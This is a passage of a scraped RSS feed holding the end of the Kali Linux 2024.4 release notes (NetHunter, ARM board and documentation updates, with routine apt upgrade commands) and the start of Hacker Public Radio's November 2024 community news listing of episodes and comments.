<p>At the same time, we have generated new <a href="https://store.nethunter.com/repo/">certificates</a> &amp; <a href="http://store.nethunter.com/store@nethunter.com-signing.gpg">keys</a>, <em>so please do not be alarmed of the change.</em></p>
<ul>
<li>GPG Key: <code>AA 12 5C D4 16 57 56 83 93 BD 57 5E E1 4B 60 F8 EF 29 08 9C</code></li>
<li>Repo Certificate: <code>aa:cb:a8:f5:23:89:39:f9</code></li>
</ul>
<p><em>We have also bump’d privileged extension app to the latest version upstream too.</em></p>
<h3>Installer</h3>
<p>The Kali NetHunter installer has had some work on it too!
It now has a new home in its own <a href="https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-installer">git repo</a> (so does <a href="https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-rootfs">rootfs</a> &amp; <a href="https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-rootless">rootless</a>) .</p>
<p>Currently its possible to install Kali NetHunter using either methods:</p>
<ul>
<li>Recovery <em>(we recommend using <a href="https://twrp.me/">TWRP</a>)</em> - the original method</li>
<li><a href="https://github.com/topjohnwu/Magisk">Magisk</a> <em>(which also give “root” permissions)</em> - the future method</li>
</ul>
<p>We have been supporting both methods for a while, and tried to keep them in sync with each other (as much as possible).
<em>Long term, we will be putting our focus into Magisk method (as that is our preferred method of “root” access).</em></p>
<p>As of Kali 2024.4, the installer now supports fully supports Magisk (able to flash the kernel) and also added support for v28 and higher! As well as installing via command line (Magisk &amp; TWRP), thanks to <code>adb</code>! There has been work done also for <a href="https://apatch.dev/">APatch</a> and <a href="https://kernelsu.org/">KernelSU</a>.</p>
<p>There has also been a ton of bug fixes and improvements made too.</p>
<h3>Website</h3>
<p>Another Kali NetHunter change happened is our <a href="https://nethunter.kali.org/">NetHunter subdomain website</a> <em>(which is <a href="https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-kernels">automated CI output</a>)</em>.</p>
<p>The new structure should give an easier overview and understanding of the whole process":</p>
<ul>
<li>All <a href="https://nethunter.kali.org/images.html">pre-created images</a> - the items that <a href="https://www.kali.org/get-kali/#kali-mobile">ready to download</a></li>
<li>All <a href="https://nethunter.kali.org/image-models.html">supported devices for the pre-created images</a> - Some devices, like OnePlus 7 may have multiple items to download (for multiple Android versions)</li>
<li>Which <a href="https://nethunter.kali.org/device-kernels.html">devices have the most options</a> - how many supported kernels/Android versions and pre-created images</li>
<li><a href="https://nethunter.kali.org/kernels.html">Supported kernels</a> - Overview of ROMs and Android versions</li>
<li>Which and how many <a href="https://nethunter.kali.org/android-versions.html">Android Versions</a> are supported</li>
</ul>
<h3>Kernel/Device</h3>
<p>From a Kali NetNethunter kernel/device point of view:</p>
<ul>
<li>We now <strong>support 100 devices</strong>!
<ul>
<li>Added support to <strong>Realme X7 Max 5G</strong> (RMX3031) <em>(Thanks <a href="https://gitlab.com/dek0der">@dek0der</a>)</em></li>
<li>Added support to <strong>Xiaomi Mi 9 Lite / CC9</strong> (pyxis)</li>
<li>Updated support for Nokia 6.1 &amp; 6.1 Plus (drg)</li>
<li>Updated support for Realme C11 (RMX2185) <em>(Thanks <a href="https://gitlab.com/Frostleaft07">@Frostleaft07</a>)</em></li>
<li>Updated support for Xiaomi Mi 9T (davinci)</li>
<li>Updated support for Xiaomi Mi A3 (xiaomi-laurel)</li>
<li>Updated support for Xiaomi Pocophone F1 (beryllium)</li>
</ul>
</li>
<li>First <strong>Android 15</strong> device support (Xiaomi Mi A3 (xiaomi-laurel))</li>
<li>Generating <strong>a lot more pre-created images</strong></li>
<li>The “body of knowledge” file, <code>devices.cfg</code>, which indexes everything, has now been <strong>turned into YAML</strong>, <code>devices.yml</code>.</li>
</ul>
<h3>Package</h3>
<p>The <code>nethunter-utils</code> package has <a href="https://gitlab.com/kalilinux/packages/nethunter-utils">a new home</a> too.
And to go with it, <a href="https://gitlab.com/MrRob0-X">@Robin</a> has done a lot of audio work.</p>
<h2>Kali NetHunter Pro Updates</h2>
<p>Just a quick message to say that Kali NetHunter Pro now includes “NetHunter” and “Hijacker” apps.</p>
<p>And if you are trying to enable On-The-Go (OTG) on Xiaomi Pocophone F1 and OnePlus 6/6T, you may want to <a href="https://www.youtube.com/watch?v=bjhgKxhgmIY">watch this guide</a>.</p>
<h2>Kali ARM SBC Updates</h2>
<p>Alongside the customizable Raspberry Pi images, we have packed in several other improvements:</p>
<ul>
<li><strong>Raspberry Pi 500 Support</strong>: The Raspberry Pi 5 image <strong>should</strong> also have support for the recently announced <a href="https://www.raspberrypi.com/news/raspberry-pi-500-and-raspberry-pi-monitor-on-sale-now/">Raspberry Pi 500</a> however, we do not have the hardware to test, so please let us know if you do!</li>
<li><strong>Raspberry Pi 5</strong>:
<ul>
<li>By default, <strong>KMS (Kernel Mode Setting)</strong> is now enabled for a smoother graphical experience. If you prefer to disable it, just comment out the <code>dtoverlay=vc4-kms-v3d</code> line in the <code>/boot/config.txt</code> file.</li>
<li><strong>Auto Detection Enhancements</strong>: We have added improved detection for <strong>DSI displays</strong> and <strong>cameras</strong>. The system will automatically load the appropriate overlays, saving you time and effort during setup. It will not work for every one, but it should work for most.</li>
</ul>
</li>
<li><strong>Gateworks Newport</strong>: The second partition on the Gateworks Newport image is no longer set as bootable.</li>
<li><strong>USB Armory MKII</strong>: We have upgraded to <strong>u-boot 2024.10</strong>, the latest version of the bootloader that it uses.</li>
<li><strong>Console Fix</strong>: The character map has been set to <strong>UTF-8</strong>, so you will no longer experience corrupt characters at the console. If you are upgrading an existing installation, you can fix this by editing the <code>/etc/default/console-setup</code> file and setting <code>CHARMAP="UTF-8"</code>.</li>
<li><strong>BeagleBone Black</strong>: Thanks to a community member, the Beaglebone Black build script (which is community supported) is now able to build images successfully again.</li>
</ul>
<h2>Kali Website Updates</h2>
<h3>Kali Documentation</h3>
<p>Our <a href="https://www.kali.org/docs/">Kali documentation</a> has had a few various major updates to existing pages as well as new pages:</p>
<ul>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-oneplus-one/">Installing NetHunter on the OnePlus One</a> (new)</li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter/">Installing NetHunter</a> (updated)</li>
<li><a href="https://www.kali.org/docs/installation/installing-old-i386/">Installing old i386 images</a> (new)</li>
<li><a href="https://www.kali.org/docs/general-use/python3-external-packages/">Installing Python Applications via pipx</a> (new)</li>
<li><a href="https://www.kali.org/docs/nethunter/nethunter-audio/">NetHunter Audio</a> (new)</li>
<li><a href="https://www.kali.org/docs/nethunter/nethunter-kernel/">NetHunter Kernel</a> (new)</li>
<li><a href="https://www.kali.org/docs/nethunter/nethunter-kex/">NetHunter Kex</a> (new)</li>
<li><a href="https://www.kali.org/docs/nethunter/nethunter-modules/">NetHunter Modules</a> (new)</li>
<li><a href="https://www.kali.org/docs/nethunter/nethunter-settings/">NetHunter Settings</a> (new)</li>
<li><a href="https://www.kali.org/docs/nethunter/nethunter-wifipumpkin/">NetHunter WifiPumpkin</a> (new)</li>
<li><a href="https://www.kali.org/docs/nethunter/nethunter-wps/">NetHunter WPS Attacks</a> (new)</li>
<li><a href="https://www.kali.org/docs/community/contribute/">Where and How to Contribute to Kali</a> (updated)</li>
</ul>
<p><em>This does not include numerous minor tweaking, or typo fixing!</em></p>
<h3>Kali Blog Recap</h3>
<p>Recapping since since our last release, we did the following <a href="https://www.kali.org/blog/">blog posts</a>:</p>
<ul>
<li><a href="https://www.kali.org/blog/end-of-i386-kernel-and-images/">The end of the i386 kernel and images</a></li>
<li><a href="https://www.kali.org/blog/forums-refresh/">Forums Refresh</a></li>
<li><a href="https://www.kali.org/blog/contributing-to-kali/">Contributing to Kali</a></li>
</ul>
<h2>Community Shout-Outs</h2>
<p>These are <strong>people from the public who have helped Kali</strong> and <a href="https://www.kali.org/about-us/">the team</a> for the last release. And we want to praise them for their work <em>(we like to give credit where due!)</em>:</p>
<ul>
<li><a href="https://gitlab.com/107cwk">107cwk</a></li>
<li><a href="https://gitlab.com/Arszilla">Arszilla</a></li>
<li><a href="https://gitlab.com/atlas_c0">Atlas Co</a></li>
<li><a href="https://gitlab.com/ayusman-nanda">Ayusman Avisek Nanda</a></li>
<li><a href="https://gitlab.com/casterbyte">Caster</a></li>
<li><a href="https://gitlab.com/ChrisFDev00">ChrisFDev00</a></li>
<li><a href="https://gitlab.com/kimoc0der">Christian Bremvåg</a></li>
<li><a href="https://gitlab.com/danterolle">Dario Camonita</a></li>
<li><a href="https://gitlab.com/nuvious">David Cheeseman</a></li>
<li><a href="https://gitlab.com/dek0der">dek0der</a></li>
<li><a href="https://gitlab.com/dungdinhmanh">Dũng Đinh</a></li>
<li><a href="https://gitlab.com/whthomas22">Elliot</a></li>
<li><a href="https://twitter.com/sohrminir">hexan</a></li>
<li><a href="https://gitlab.com/MrRob0-X">Robin</a></li>
<li><a href="https://twitter.com/s3_l33">S3L33</a></li>
<li><a href="https://gitlab.com/Salty_">Salty</a></li>
<li><a href="https://gitlab.com/serval123">serval</a></li>
<li><a href="https://gitlab.com/IamCOD3X">Sourabh Panchal</a></li>
<li><a href="https://gitlab.com/Strix-Vyxlor">Strix Vyxlor</a></li>
<li><a href="https://gitlab.com/Shubhamvis98">Subham Vishwakarma</a></li>
<li><a href="https://gitlab.com/yesimxev">yesimxev</a></li>
<li><a href="https://gitlab.com/Umaru-Xi">Yuki Nix</a></li>
<li><a href="https://gitlab.com/vvvbbbcz">自由的铁矿</a></li>
</ul>
<p>Anyone can help out, anyone can get <a href="https://www.kali.org/docs/community/contribute/">involved</a>!</p>
<h2>Miscellaneous</h2>
<p>Below are a few other things which have been updated in Kali, which we are calling out which do not have as much detail:</p>
<ul>
<li>@elwood gave a talk at <a href="https://www.infosec-city.com/schedule/sin24-con">SINCON 2024</a> back in May 2024, which is now public: <a href="https://www.youtube.com/watch?v=3O2W7_NkAfQ">Kali Linux: Unveiling the Hidden Gems of the Industry Standard - by Jim O’Gorman</a> </li>
<li>(Xfce4) <code>xcape</code> no longer required for super key (menu) shortcut</li>
<li>(GNOME) <code>gnome-text-editor</code> sysntax highlighting theme has been improved</li>
<li>Fixed LightDM session not loading profile configuration files</li>
</ul>
<hr>
<h2>Get Kali Linux 2024.4</h2>
<p><strong>Fresh Images</strong>:
So what are you waiting for? Go <a href="https://www.kali.org/get-kali/">get Kali</a> already!</p>
<p>Seasoned Kali Linux users are already aware of this, but for the ones who are not, we do also produce <strong><a href="https://cdimage.kali.org/kali-images/kali-weekly/">weekly builds</a></strong> that you can use as well. If you cannot wait for our next release and you want the latest packages <em>(or bug fixes)</em> when you download the image, you can just use the weekly image instead.
This way you will have fewer updates to do.
<em>Just know that these are automated builds that we do not QA like we do our standard <a href="https://www.kali.org/releases/">release images</a></em>. But we gladly take <a href="https://bugs.kali.org/">bug reports</a> about those images because we want any issues to be fixed before our next release!</p>
<p><strong>Existing Installs</strong>:
If you already have an existing Kali Linux installation, remember you can always do a quick <a href="https://www.kali.org/docs/general-use/updating-kali/">update</a>:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list
[...]
┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt -y full-upgrade
[...]
┌──(kali㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~/
[...]
┌──(kali㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] &amp;&amp; sudo reboot -f
</code></pre>
<p>You should now be on Kali Linux 2024.4 We can do a quick check by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ grep VERSION /etc/os-release
VERSION_ID="2024.4"
VERSION="2024.4"
VERSION_CODENAME=kali-rolling
┌──(kali㉿kali)-[~]
└─$ uname -v
#1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15)
┌──(kali㉿kali)-[~]
└─$ uname -r
6.11.2-amd64
</code></pre>
<p><em>NOTE: The output of <code>uname -r</code> may be different depending on the system <a href="https://pkg.kali.org/pkg/linux">architecture</a>.</em></p>
<p>As always, should you come across any bugs in Kali, please submit a report on our <a href="https://bugs.kali.org/">bug tracker</a>. <em>We will never be able to fix what we do not know is broken!</em> <strong>And Social networks are not bug trackers!</strong></p>
<p>Want to keep up-to-date easier? We have got you!</p>
<ul>
<li><a href="https://www.kali.org/blog/">Blog</a>? Use our <a href="https://www.kali.org/rss.xml">RSS feeds</a> and <a href="https://www.kali.org/newsletter/">newsletter</a></li>
<li>Download? We have a <a href="https://www.kali.org/torrents.xml">Torrent RSS feed</a></li>
<li>Socials? <a href="https://www.facebook.com/KaliLinux/">Facebook</a>, <a href="https://www.instagram.com/kalilinux/">Instagram</a>, <a href="https://infosec.exchange/@kalilinux">Mastodon</a> &amp; <a href="https://x.com/kalilinux">X/Twitter</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4261: HPR Community News for November 2024]]></title>
<description><![CDATA[This show has been flagged as Explicit by the host.


New hosts

Welcome to our new host: 

    SolusSpider.


Last Month's Shows


Id
Day
Date
Title
Host


4240
Fri
2024-11-01
The First Doctor, Part 1
Ahuka


4241
Mon
2024-11-04
HPR Community News for October 2024
HPR Volunteers


4242
Tue
2024-...]]></description>
<link>https://tsecurity.de/de/2473645/podcasts/hpr4261-hpr-community-news-for-november-2024/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2473645/podcasts/hpr4261-hpr-community-news-for-november-2024/</guid>
<pubDate>Mon, 02 Dec 2024 01:04:14 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Explicit by the host.</p>


<h2>New hosts</h2>
<p>
Welcome to our new host: <br>

    <a href="https://hackerpublicradio.org/correspondents/0437.html" target="_blank">SolusSpider</a>.
</p>

<h2>Last Month's Shows</h2>
<table>
<tr>
<th>Id</th>
<th>Day</th>
<th>Date</th>
<th>Title</th>
<th>Host</th>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4240/index.html" target="_blank">4240</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-11-01</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4240/index.html" target="_blank">The First Doctor, Part 1</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4241/index.html" target="_blank">4241</a></strong></td>
<td>Mon</td>
<td class="shrink">2024-11-04</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4241/index.html" target="_blank">HPR Community News for October 2024</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0159.html" target="_blank">HPR Volunteers</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4242/index.html" target="_blank">4242</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-11-05</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4242/index.html" target="_blank">Interview with Lorenzo 'kelset' Sciandra</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4243/index.html" target="_blank">4243</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-11-06</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4243/index.html" target="_blank">Hand Warmer, long term product review</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0201.html" target="_blank">MrX</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4244/index.html" target="_blank">4244</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-11-07</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4244/index.html" target="_blank">Two methods of digitizing photos.</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0429.html" target="_blank">Henrik Hemrin</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4245/index.html" target="_blank">4245</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-11-08</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4245/index.html" target="_blank">What's in my bag?</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0394.html" target="_blank">Trey</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4246/index.html" target="_blank">4246</a></strong></td>
<td>Mon</td>
<td class="shrink">2024-11-11</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4246/index.html" target="_blank">Bytes, Pages and Screens</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0403.html" target="_blank">Lee</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4247/index.html" target="_blank">4247</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-11-12</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4247/index.html" target="_blank">Installing GuixSD--Part Deux</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0293.html" target="_blank">Rho`n</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4248/index.html" target="_blank">4248</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-11-13</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4248/index.html" target="_blank">Millie Perkins</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4249/index.html" target="_blank">4249</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-11-14</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4249/index.html" target="_blank">Audio Streams on the Command Line</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0296.html" target="_blank">Kevie</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4250/index.html" target="_blank">4250</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-11-15</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4250/index.html" target="_blank">Playing Civilization IV, Part 3</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4251/index.html" target="_blank">4251</a></strong></td>
<td>Mon</td>
<td class="shrink">2024-11-18</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4251/index.html" target="_blank">Dave and MrX turn over a new leaf</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0225.html" target="_blank">Dave Morriss</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4252/index.html" target="_blank">4252</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-11-19</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4252/index.html" target="_blank">Privacy is not hiding</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0391.html" target="_blank">Some Guy On The Internet</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4253/index.html" target="_blank">4253</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-11-20</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4253/index.html" target="_blank">A brief introduction of myself</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0414.html" target="_blank">Kinghezy</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4254/index.html" target="_blank">4254</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-11-21</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4254/index.html" target="_blank">Cake Money Money Cake Money Money Cake!</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0036.html" target="_blank">operat0r</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4255/index.html" target="_blank">4255</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-11-22</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4255/index.html" target="_blank">What is on My Podcast Player 2024, Part 1</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4256/index.html" target="_blank">4256</a></strong></td>
<td>Mon</td>
<td class="shrink">2024-11-25</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4256/index.html" target="_blank">Birds of a Feather Talk at OLF 2024</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0270.html" target="_blank">Thaj Sara</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4257/index.html" target="_blank">4257</a></strong></td>
<td>Tue</td>
<td class="shrink">2024-11-26</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4257/index.html" target="_blank">Movie review: The Artifice Girl</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0296.html" target="_blank">Kevie</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4258/index.html" target="_blank">4258</a></strong></td>
<td>Wed</td>
<td class="shrink">2024-11-27</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4258/index.html" target="_blank">Introduction and History of Using Computers</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0437.html" target="_blank">SolusSpider</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4259/index.html" target="_blank">4259</a></strong></td>
<td>Thu</td>
<td class="shrink">2024-11-28</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4259/index.html" target="_blank">Why digitize photos</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0429.html" target="_blank">Henrik Hemrin</a></td>
</tr>
<tr>
<td><strong><a href="https://hackerpublicradio.org/eps/hpr4260/index.html" target="_blank">4260</a></strong></td>
<td>Fri</td>
<td class="shrink">2024-11-29</td>
<td><a href="https://hackerpublicradio.org/eps/hpr4260/index.html" target="_blank">The Golden Age</a></td>
<td><a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a></td>
</tr>
</table>

<h2>Comments this month</h2>

<p>These are comments which have been made during the past month, either to shows released during the month or to past shows.
There are 61 comments in total.</p>
<h3>Past shows</h3>
<p>There are 21 comments on
17 previous shows:</p>
<ul>
<li><strong><a href="https://hackerpublicradio.org/eps/hpr0870/index.html#comments" target="_blank">hpr0870</a></strong>
(2011-12-02) "<em>Computer Memories</em>"
by <a href="https://hackerpublicradio.org/correspondents/0194.html" target="_blank">Deltaray</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr0870/index.html#comment_4152" target="_blank">Comment 3</a>:
SolusSpider - Peter Paterson on 2024-11-29:
"Commonality on Deltaray's computer experiences"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr1322/index.html#comments" target="_blank">hpr1322</a></strong>
(2013-08-27) "<em>Kevin O'Brien - Ohio LinuxFest 2013</em>"
by <a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr1322/index.html#comment_4140" target="_blank">Comment 1</a>:
SolusSpider - Peter Paterson on 2024-11-26:
"Attended OLF2013"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr1642/index.html#comments" target="_blank">hpr1642</a></strong>
(2014-11-18) "<em>Frist Time at Oggcamp</em>"
by <a href="https://hackerpublicradio.org/correspondents/0290.html" target="_blank">Al</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr1642/index.html#comment_4146" target="_blank">Comment 2</a>:
SolusSpider - Peter Paterson on 2024-11-27:
"Al at Oggcamp - 10 years later"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr1890/index.html#comments" target="_blank">hpr1890</a></strong>
(2015-10-30) "<em>A short walk with my son</em>"
by <a href="https://hackerpublicradio.org/correspondents/0314.html" target="_blank">thelovebug</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr1890/index.html#comment_4117" target="_blank">Comment 4</a>:
SolusSpider - Peter Paterson on 2024-11-11:
"Comment on A short walk with my son"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr2503/index.html#comments" target="_blank">hpr2503</a></strong>
(2018-03-07) "<em>My journey into podcasting</em>"
by <a href="https://hackerpublicradio.org/correspondents/0314.html" target="_blank">thelovebug</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr2503/index.html#comment_4129" target="_blank">Comment 3</a>:
SolusSpider - Peter Paterson on 2024-11-18:
"Comment on TheLoveBug journey into podcasting."</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr2673/index.html#comments" target="_blank">hpr2673</a></strong>
(2018-10-31) "<em>Urandom - Ohio Linux Fest 2-18 Podcaster Roundtable</em>"
by <a href="https://hackerpublicradio.org/correspondents/0270.html" target="_blank">Thaj Sara</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr2673/index.html#comment_4139" target="_blank">Comment 1</a>:
SolusSpider - Peter Paterson on 2024-11-26:
"Wonderful OLF Podcasters Banter"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr3315/index.html#comments" target="_blank">hpr3315</a></strong>
(2021-04-16) "<em>tesseract optical character recognition</em>"
by <a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr3315/index.html#comment_4149" target="_blank">Comment 2</a>:
SolusSpider - Peter Paterson on 2024-11-28:
"Tessaract OCR User"</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr3315/index.html#comment_4151" target="_blank">Comment 3</a>:
SolusSpider - Peter Paterson on 2024-11-29:
"Spelling of tesseract"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr3998/index.html#comments" target="_blank">hpr3998</a></strong>
(2023-11-29) "<em>Using open source OCR to digitize my mom's book</em>"
by <a href="https://hackerpublicradio.org/correspondents/0194.html" target="_blank">Deltaray</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr3998/index.html#comment_4150" target="_blank">Comment 3</a>:
SolusSpider - Peter Paterson on 2024-11-29:
"Experience with Tesseract OCR software"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4106/index.html#comments" target="_blank">hpr4106</a></strong>
(2024-04-29) "<em>My tribute to feeds</em>"
by <a href="https://hackerpublicradio.org/correspondents/0429.html" target="_blank">Henrik Hemrin</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4106/index.html#comment_4143" target="_blank">Comment 1</a>:
SolusSpider - Peter Paterson on 2024-11-27:
"New(ish) to Feeds"</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4106/index.html#comment_4154" target="_blank">Comment 2</a>:
Henrik Hemrin on 2024-11-29:
"Thanks for feedback"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4129/index.html#comments" target="_blank">hpr4129</a></strong>
(2024-05-30) "<em>How I found Hacker Public Radio</em>"
by <a href="https://hackerpublicradio.org/correspondents/0429.html" target="_blank">Henrik Hemrin</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4129/index.html#comment_4145" target="_blank">Comment 1</a>:
SolusSpider - Peter Paterson on 2024-11-27:
"My own story of finding HPR"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4132/index.html#comments" target="_blank">hpr4132</a></strong>
(2024-06-04) "<em>Urandom talks about the future of HPR</em>"
by <a href="https://hackerpublicradio.org/correspondents/0270.html" target="_blank">Thaj Sara</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4132/index.html#comment_4126" target="_blank">Comment 4</a>:
SolusSpider - Peter Paterson on 2024-11-18:
"Comment on Urandom talks about the future of HPR"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4195/index.html#comments" target="_blank">hpr4195</a></strong>
(2024-08-30) "<em>Hacking HPR Hosts</em>"
by <a href="https://hackerpublicradio.org/correspondents/0030.html" target="_blank">Ken Fallon</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4195/index.html#comment_4153" target="_blank">Comment 2</a>:
SolusSpider - Peter Paterson on 2024-11-29:
"Another comment for Ken - he hacked this host"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4200/index.html#comments" target="_blank">hpr4200</a></strong>
(2024-09-06) "<em>Intro to Doctor Who</em>"
by <a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4200/index.html#comment_4112" target="_blank">Comment 5</a>:
SolusSpider - Peter Paterson on 2024-11-09:
"Comment on Introduction To Doctor Who"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4220/index.html#comments" target="_blank">hpr4220</a></strong>
(2024-10-04) "<em>How Doctor Who Began</em>"
by <a href="https://hackerpublicradio.org/correspondents/0198.html" target="_blank">Ahuka</a>.<br>
</li><li>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr4220/index.html#comment_4118" target="_blank">Comment 1</a>:
SolusSpider - Peter Paterson on 2024-11-11:
"Comment on How Doctor Who Began"</li></ul><br>
</li><li><strong><a href="https://hackerpublicradio.org/eps/hpr4233/index.html#comments" target="_blank">hpr4233</a></strong>
